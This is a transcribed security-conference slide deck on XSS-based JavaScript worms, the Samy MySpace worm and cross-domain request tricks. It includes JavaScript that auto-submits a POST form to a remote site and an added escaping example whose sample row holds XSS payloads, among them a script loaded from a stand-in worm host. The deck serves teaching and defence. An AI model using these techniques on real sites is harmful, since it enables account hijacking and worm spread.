Javascript worms By Benjamin Mossé SecPro


1 Javascript worms
The next step in the evolution
By Benjamin Mossé, SecPro

2 Synopsis
- Introduction to cross site scripting
- Permanent XSS
- Javascript worms up to now
- A fresh technique: remote requests
- Taking advantage of APIs to build worms
- Protecting yourself
- Conclusion

3 Introduction to XSS
- The most common web vulnerability
- Allows client-side script injection (HTML, JavaScript, VBScript, etc.)
- The target executes the malicious code
- There isn't any “magic” solution against it

4 Introduction to XSS (cont.)
- JavaScript is the language used to exploit this vulnerability
- Before 2005, XSS wasn't considered critical
- Wrong idea: “you can only steal cookies with it”
- 2005: Ajax, possibility to create HTTP requests
- Too many people thought that XSS wasn't powerful because you can only steal a cookie with it
- The community had new requirements, and Ajax was born
- The XSS vulnerability is now critical

5 Introduction to XSS (cont.)
- 3 different types: non-permanent, permanent, DOM-based
- A JavaScript exploit would work the same with every one of them

6 Permanent XSS
- Stays on the website permanently
- Also known as persistent
- The JavaScript exploit is stored (e.g. database, RSS)
- Affects every person visiting the infected page

7 Permanent XSS (cont.)
Diagram: hacker -> vulnerable site -> database -> infected site -> users
- The hacker inserts malicious code in a form on the vulnerable site
- The website saves the script into the database
- Users visiting the infected site get exploited
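As an added defensive example (not from the slides), the rendering step that keeps a script saved through a form from running when the page is served back again; Node.js, with the stored "database row" and the example.com base URL constructed here:

```javascript
// Render stored user content so a script saved through a form is shown as
// text, never executed. Node.js; the "database row" is constructed below.

// Escape the characters that matter in HTML text and quoted attributes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Escaping alone does not cover URL attributes: a stored "javascript:" link
// still runs on click. Allow only http(s); anything else becomes an inert "#".
function safeHref(url) {
  try {
    // placeholder base for relative links; assumed, not from the slides
    const u = new URL(String(url), "https://example.com/");
    return ["http:", "https:"].includes(u.protocol) ? escapeHtml(u.href) : "#";
  } catch {
    return "#";
  }
}

// Build the profile fragment the way a template would, escaping per context.
function renderProfile(row) {
  return '<div class="profile">' +
    `<h2 title="${escapeHtml(row.name)}">${escapeHtml(row.name)}</h2>` +
    `<p>${escapeHtml(row.about)}</p>` +
    `<a href="${safeHref(row.homepage)}">homepage</a></div>`;
}

// Constructed row: what a worm payload saved via an "about me" form looks like.
const storedRow = {
  name: 'samy" onmouseover="alert(1)',
  about: '<script src="http://worm.invalid/w.js"></script>',
  homepage: "javascript:alert(document.cookie)",
};

console.log(renderProfile(storedRow));
```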

8 “Samy is my Hero”
- Infected MySpace and took it down
- Most famous JavaScript worm
- Spread through a permanent XSS
- Made users perform malicious commands using Ajax
- Users would re-infect their account

9 Samy is my Hero (analysis)
Diagram: MYSPACE.COM, the worm site on MySpace, and its users
- The infected page makes the users infect other pages on the website: THE WORM IS SPREADING EVERYWHERE

10 Javascript worm assets
- Very hard to detect
- Very stealthy: runs in the background and doesn't modify your web page
- It's not the attacker who performs the attack but an exploited user
- Can spread very quickly
- Up to a certain point it's impossible to trace back to the attacker

11 Using Ajax
- Perform HTTP requests on the infected website
- NO REMOTE REQUESTS, only works on the same domain
- Hacking possibilities: make the target perform requests they didn't intend to (e.g. password modification, delete account, change , change secret question, exploit SQL injection, exploit remote code execution, spread the worm, deface website ...)

12 A fresh technique: remote requests
- Is it really impossible to make remote HTTP requests with JavaScript? -> NO!
- GET request methodologies:
  - Append an image to the page (e.g. <img src=” />)
  - Append a frame to the page (e.g. <iframe src=” />)
- POST request methodologies:
  - Append a complete form to the page
  - Submit the form with JavaScript (e.g. page.form.submit();)

13 Processing POST requests
var objBody = document.getElementsByTagName("body")[0];
// Build a form whose action points at the remote site. The transcript lost the
// URL; "REMOTE_URL" is a placeholder, not a value from the slide.
var form = document.createElement("form");
var form_action = document.createAttribute("action");
form_action.value = "REMOTE_URL";
form.setAttributeNode(form_action);
// Without an explicit method the browser would submit a GET, not a POST.
var form_method = document.createAttribute("method");
form_method.value = "post";
form.setAttributeNode(form_method);
// One field; its name was not in the transcript, "username" is assumed.
var input_username = document.createElement("input");
var attr_username_name = document.createAttribute("name");
attr_username_name.value = "username";
input_username.setAttributeNode(attr_username_name);
form.appendChild(input_username);
// Attach the form to the document and submit it (submitting our own form
// object rather than the page's first form, which may not be ours).
objBody.appendChild(form);
form.submit();

14 GNUCITIZEN: AttackAPI
- Hackers' API to build JavaScript worms
- Uses Google's APIs to search for targets
- Makes the manipulation of web pages with JavaScript easy
- Other features: cookie stealing and modifying, CSRF attacks, port scanner, form hijacking and more! And much more to come in the next version.

15 Future worms
Diagram: (1) users visit a web page infected with a worm; (2) the worm looks for vulnerable targets on the Internet using the Google API; (3) the worm uses the visitors to infect or attack the list of other websites it found.

16 Risk? Consequences? Obviously very high!
- Imagine someone finding a permanent XSS on a website like MySpace and using its users to launch an attack on other Internet websites.
- Imagine your company website being targeted by millions of MySpace users.
- Imagine that when security experts look at who hacked a website they don't find the attacker's IP but yours. What will you do?

17 Protecting your applications
“Satisfaction remains a shape of resignation”
- Start by educating your programmers in secure programming
- Ask SecPro for regular security checks of your web applications

18 Conclusion
- It's now possible to massively attack the Internet with an XSS vulnerability
- Never underestimate the cross site scripting vulnerability again!
- Protect your web application against it, not only for your own security but for the entire Internet community

19 Benjamin Mossé
Security Specialist with SecPro (Melbourne, Australia)
Researcher & programmer
SecPro specializes in penetration testing and consulting on web application security.

